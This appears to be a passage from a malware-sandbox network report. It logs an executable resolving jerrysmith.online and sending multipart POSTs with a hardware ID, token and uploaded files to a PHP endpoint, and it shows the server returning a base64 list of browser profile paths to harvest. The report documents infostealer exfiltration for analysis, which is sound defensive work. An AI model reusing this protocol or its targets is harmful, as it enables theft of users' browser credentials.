Mar 22, 2023 11:21:33.996622086 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:33.996624947 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.996624947 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.996669054 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:33.996680021 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.996716022 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:33.996717930 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.996762991 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:33.996764898 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.996795893 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:33.996809959 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.996829987 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:33.996845961 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.996862888 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:33.996886969 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.996893883 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:33.996918917 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.996964931 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.997020006 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:33.997070074 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.998177052 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:33.998214960 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:33.998250008 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:33.998265028 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.998286009 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:33.998290062 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.998307943 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:33.998337030 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:34.023341894 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.023396015 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.023426056 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:34.023453951 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.023467064 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:34.023488998 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.023494005 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:34.023531914 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:34.023642063 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.023694992 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.023700953 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:34.023749113 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:34.023775101 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.023811102 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.023825884 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:34.023844957 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.023866892 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:34.023889065 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:34.024063110 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.024101019 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.024126053 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:34.024142027 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:34.024152040 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.024194002 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:34.024195910 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.024239063 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:34.024245977 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.024292946 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:34.024410963 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.024444103 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.024461985 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:34.024477005 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.024497032 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:34.024511099 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.024537086 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:34.024568081 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:34.024601936 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.024657011 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:34.024696112 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.024733067 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.024741888 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:34.024766922 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.024905920 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.025042057 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.025074005 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.025105000 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.025135994 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.025168896 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.025198936 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.025286913 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.025319099 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.025404930 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.025439978 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.025471926 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.025502920 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.025640965 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.025677919 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.025712013 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.050014019 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.050323009 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.050632954 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.050868988 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.050914049 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.051141977 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.051191092 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.051235914 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.051577091 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.051620960 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.051804066 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.051919937 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.052051067 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.052092075 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.052262068 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.052299976 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.052333117 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.052407980 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.052454948 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.052498102 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.052536964 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.052571058 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.052611113 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.052645922 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.053162098 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.053208113 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.053262949 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.053299904 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.053339958 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.053374052 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.053406000 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.053437948 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.053469896 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.053508997 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.053544044 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.053585052 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.253658056 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:34.253918886 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:34.264933109 CET	49734	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:34.292165041 CET	80	49734	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:35.300602913 CET	49739	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:35.327306032 CET	80	49739	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:35.328958988 CET	49739	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:35.330427885 CET	49739	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:35.400194883 CET	80	49739	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:35.472712040 CET	80	49739	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:35.474637032 CET	49739	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:35.474822998 CET	49739	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:35.501337051 CET	80	49739	85.31.45.22	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 22, 2023 11:21:17.353929996 CET	58218	53	192.168.2.5	8.8.8.8
Mar 22, 2023 11:21:17.373775959 CET	53	58218	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 22, 2023 11:21:17.353929996 CET	192.168.2.5	8.8.8.8	0x4693	Standard query (0)	jerrysmith.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 22, 2023 11:21:17.373775959 CET	8.8.8.8	192.168.2.5	0x4693	No error (0)	jerrysmith.online		85.31.45.22	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

jerrysmith.online

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49690	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:17.410795927 CET	0	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAEHDBAAECBFHJKFCFBF Host: jerrysmith.online Content-Length: 214 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 33 39 44 38 37 45 35 33 30 38 36 33 35 37 36 38 35 30 37 39 38 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 2d 2d 0d 0a Data Ascii: ------CAEHDBAAECBFHJKFCFBFContent-Disposition: form-data; name="hwid"F39D87E530863576850798------CAEHDBAAECBFHJKFCFBFContent-Disposition: form-data; name="build"default------CAEHDBAAECBFHJKFCFBF--
Mar 22, 2023 11:21:17.835606098 CET	1	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:17 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 144 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 59 57 55 31 4e 44 56 69 59 54 4d 30 4e 32 51 79 5a 6a 45 30 5a 44 45 34 5a 6a 55 35 59 6d 5a 6b 4d 7a 45 33 59 7a 55 31 4d 32 4d 34 4f 44 68 6c 5a 47 55 35 4e 54 4d 79 59 54 68 6c 4e 57 4e 6b 59 57 4d 31 4d 6a 41 77 4d 44 45 30 4e 6a 45 33 4d 44 59 31 59 54 42 6a 5a 54 68 6b 4f 57 51 34 66 47 6c 7a 5a 47 39 75 5a 58 78 6b 62 32 4e 70 59 53 35 6b 62 32 4e 34 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d Data Ascii: YWU1NDViYTM0N2QyZjE0ZDE4ZjU5YmZkMzE3YzU1M2M4ODhlZGU5NTMyYThlNWNkYWM1MjAwMDE0NjE3MDY1YTBjZThkOWQ4fGlzZG9uZXxkb2NpYS5kb2N4fDF8MXwxfDF8MXwxfDF8MXw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49691	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:17.890074968 CET	2	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAKFBGCBFHIJKECGIIJ Host: jerrysmith.online Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 4b 46 42 47 43 42 46 48 49 4a 4b 45 43 47 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 61 33 34 37 64 32 66 31 34 64 31 38 66 35 39 62 66 64 33 31 37 63 35 35 33 63 38 38 38 65 64 65 39 35 33 32 61 38 65 35 63 64 61 63 35 32 30 30 30 31 34 36 31 37 30 36 35 61 30 63 65 38 64 39 64 38 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 4b 46 42 47 43 42 46 48 49 4a 4b 45 43 47 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 4b 46 42 47 43 42 46 48 49 4a 4b 45 43 47 49 49 4a 2d 2d 0d 0a Data Ascii: ------HCAKFBGCBFHIJKECGIIJContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------HCAKFBGCBFHIJKECGIIJContent-Disposition: form-data; name="message"browsers------HCAKFBGCBFHIJKECGIIJ--
Mar 22, 2023 11:21:18.012531996 CET	3	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:17 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1340 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 5a 70 64 6d 46 73 5a 47 6c 38 58 46 5a 70 64 6d 46 73 5a 47 6c 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 44 62 32 31 76 5a 47 38 67 52 48 4a 68 5a 32 39 75 66 46 78 44 62 32 31 76 5a 47 39 63 52 48 4a 68 5a 32 39 75 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 52 58 42 70 59 31 42 79 61 58 5a 68 59 33 6c 43 63 6d 39 33 63 32 56 79 66 46 78 46 63 47 6c 6a 49 46 42 79 61 58 5a 68 59 33 6b 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 76 59 30 4e 76 59 33 78 63 51 32 39 6a 51 32 39 6a 58 45 4a 79 62 33 64 7a 5a 58 4a 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 43 63 6d 46 32 5a 58 78 63 51 6e 4a 68 64 6d 56 54 62 32 5a 30 64 32 46 79 5a 56 78 43 63 6d 46 32 5a 53 31 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 51 32 56 75 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 64 54 64 47 46 79 66 46 77 33 55 33 52 68 63 6c 77 33 55 33 52 68 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 5a 57 52 76 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 61 47 56 6b 62 33 52 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 4e 61 57 4e 79 62 33 4e 76 5a 6e 51 67 52 57 52 6e 5a 58 78 63 54 57 6c 6a 63 6d 39 7a 62 32 5a 30 58 45 56 6b 5a 32 56 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 7a 4e 6a 41 67 51 6e 4a 76 64 33 4e 6c 63 6e 78 63 4d 7a 59 77 51 6e 4a 76 64 33 4e 6c 63 6c 78 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 55 56 46 43 63 6d 39 33 63 32 56 79 66 46 78 55 5a 57 35 6a 5a 57 35 30 58 46 46 52 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 79 65 58 42 30 62 31 52 68 59 6e 78 63 51 33 4a 35 63 48 52 76 56 47 46 69 49 45 4a 79 62 33 64 7a 5a 58 4a 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 50 63 47 56 79 59 53 42 54 64 47 46 69 62 47 56 38 58 45 39 77 5a 58 4a 68 49 46 4e 76 5a 6e 52 33 59 58 4a 6c 66 47 39 77 5a 58 4a 68 66 45 39 77 5a 58 4a 68 49 45 64 59 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 54 57 39 36 61 57 78 73 59 53 42 47 61 58 Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIERhdGF8Y2hyb21lfFZpdmFsZGl8XFZpdmFsZGlcVXNlciBEYXRhfGNocm9tZXxDb21vZG8gRHJhZ29ufFxDb21vZG9cRHJhZ29uXFVzZXIgRGF0YXxjaHJvbWV8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfENvY0NvY3xcQ29jQ29jXEJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxCcmF2ZXxcQnJhdmVTb2Z0d2FyZVxCcmF2ZS1Ccm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8Q2VudCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXxNaWNyb3NvZnQgRWRnZXxcTWljcm9zb2Z0XEVkZ2VcVXNlciBEYXRhfGNocm9tZXwzNjAgQnJvd3NlcnxcMzYwQnJvd3NlclxCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfENyeXB0b1RhYnxcQ3J5cHRvVGFiIEJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxPcGVyYSBTdGFibGV8XE9wZXJhIFNvZnR3YXJlfG9wZXJhfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8TW96aWxsYSBGaX
Mar 22, 2023 11:21:18.012573004 CET	3	IN	Data Raw: 4a 6c 5a 6d 39 34 66 46 78 4e 62 33 70 70 62 47 78 68 58 45 5a 70 63 6d 56 6d 62 33 68 63 55 48 4a 76 5a 6d 6c 73 5a 58 4e 38 5a 6d 6c 79 5a 57 5a 76 65 48 78 51 59 57 78 6c 49 45 31 76 62 32 35 38 58 45 31 76 62 32 35 6a 61 47 6c 73 5a 43 42 51 Data Ascii: JlZm94fFxNb3ppbGxhXEZpcmVmb3hcUHJvZmlsZXN8ZmlyZWZveHxQYWxlIE1vb258XE1vb25jaGlsZCBQcm9kdWN0aW9uc1xQYWxlIE1vb25cUHJvZmlsZXN8ZmlyZWZveHxPcGVyYSBDcnlwdG8gU3RhYmxlfFxPcGVyYSBTb2Z0d2FyZXxvcGVyYXxUaHVuZGVyYmlyZHxcVGh1bmRlcmJpcmRcUHJvZmlsZXN8ZmlyZWZve

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.5	49700	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:23.007649899 CET	1209	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJKKFIJKFCAKJJJKJKFI Host: jerrysmith.online Content-Length: 1747 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:23.007649899 CET	1211	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="file_name"ZmlsZXNcUkVDR
Mar 22, 2023 11:21:23.195620060 CET	1211	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.5	49701	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:23.238451004 CET	1212	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFIECFIJDAAKEBGCGHIE Host: jerrysmith.online Content-Length: 1747 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:23.238593102 CET	1214	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 43 46 49 4a 44 41 41 4b 45 42 47 43 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------CFIECFIJDAAKEBGCGHIEContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------CFIECFIJDAAKEBGCGHIEContent-Disposition: form-data; name="file_name"ZmlsZXNcUkVDR
Mar 22, 2023 11:21:23.390814066 CET	1214	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.5	49702	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:23.426356077 CET	1215	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECFIEGDBKJKFIDHIECG Host: jerrysmith.online Content-Length: 1747 Connection: Keep-Alive Cache-Control: no-cache
